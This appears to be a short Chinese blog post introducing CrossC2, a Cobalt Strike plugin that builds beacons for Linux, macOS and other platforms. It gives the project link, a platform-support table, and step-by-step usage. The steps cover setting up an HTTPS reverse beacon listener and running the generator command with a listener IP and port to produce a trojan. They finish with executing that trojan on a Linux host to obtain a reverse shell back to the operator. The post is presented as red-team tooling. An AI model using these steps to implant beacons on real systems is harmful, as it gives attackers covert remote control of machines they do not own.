后知后觉 发了一个大佬们用了很久的工具
CrossC2插件是为企业和红团队人员提供的安全框架,支持 CobaltStrike 对其他平台的渗透测试(Linux / MacOS /…),支持自定义模块,并包括一些常用的渗透模块。
利用CrossC2插件通过在Linux上执行木马反弹一个CobaltStrike类型的shell。
CrossC2插件项目地址:https://github.com/gloxec/CrossC2
Windows | Linux | MacOS | iOS | Android | Embedded | |
---|---|---|---|---|---|---|
Run Env (x86) | √ | |||||
Run Env (x64) | √ | √ | √ | |||
gen beacon (x86) | √ | √ | ||||
gen beacon (x64) | √ | √ | ||||
gen beacon (armv7) | ⍻ | √ | ||||
gen beacon (arm64) | √ | √ | ||||
gen beacon (mips[el]) | ⍻ |
受限描述:
CobaltStrike: 暂时仅支持3.14最后一个版本(bug fixs), 以及4.x版本(详见cs4.1分支).
Linux: 特别老旧的系统可以选择cna中的"Linux-GLIBC"选项(2010年左右)
MacOS: 新系统仅支持64位程序
iOS: sandbox
Embedded: only *nix
⍻ : 加载还在完善中
用法:
https://gloxec.github.io/CrossC2/zh_cn/usage/genCross.html
1.genCrossC2.Linux 文件上传到CobaltStrike服务端目录下。
img
2.由于 Cross C2目前只支持HTTPS Beacon,所以在Listenrs中选择HTTPS进行监听,服务端开启监听 windows/beacon_https/reverse_https 类型的beacon
3.生成木马
./genCrossC2.Linux 监听的IP 监听的端口 null null Linux x64 test
4.执行木马上线
成功上线